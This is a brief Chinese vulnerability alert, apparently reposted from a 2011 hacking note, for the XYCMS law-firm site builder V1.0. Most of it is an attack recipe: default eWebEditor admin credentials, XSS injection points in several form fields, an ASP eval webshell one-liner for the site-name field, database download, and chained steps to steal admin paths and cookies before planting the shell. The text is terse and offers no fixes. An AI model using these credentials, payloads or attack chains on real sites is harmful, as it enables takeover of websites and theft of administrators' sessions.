XYCMS律师事务所建站系统V1.0多处缺陷漏洞预警-电脑资
料
##XYCMS律师事务所建站系统V1.0
##B0mbErM@n;2011-2-18
#eWebEditor
##Ur=XY2010Pass=XY2010
##XSS
#Qq:[XSS]
Mail:[XSS]
Photo:[XSS]
Contents:[XSS]
##Eval
#WebName:<%evalrequest("pass")%>
##MDB
##Hacking
1:eWebEditor
2:XSS+Eval
(1)标题和姓名写的真实些
(2)插入XSS获取后台路径以及cookie
(3)Eval
3:MDB+Eval
(1)MDB
(2)Eval
4:XSS+MDB+Eval
(1)MDB
(2)XSS-标题和姓名写的真实些
(3)插入XSS获取后台路径
(4)Eval
本文发布于:2023-03-13 15:17:37,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/zhishi/a/167869185828071.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文word下载地址:xycms.doc
本文 PDF 下载地址:xycms.pdf
| 留言与评论(共有 0 条评论) |
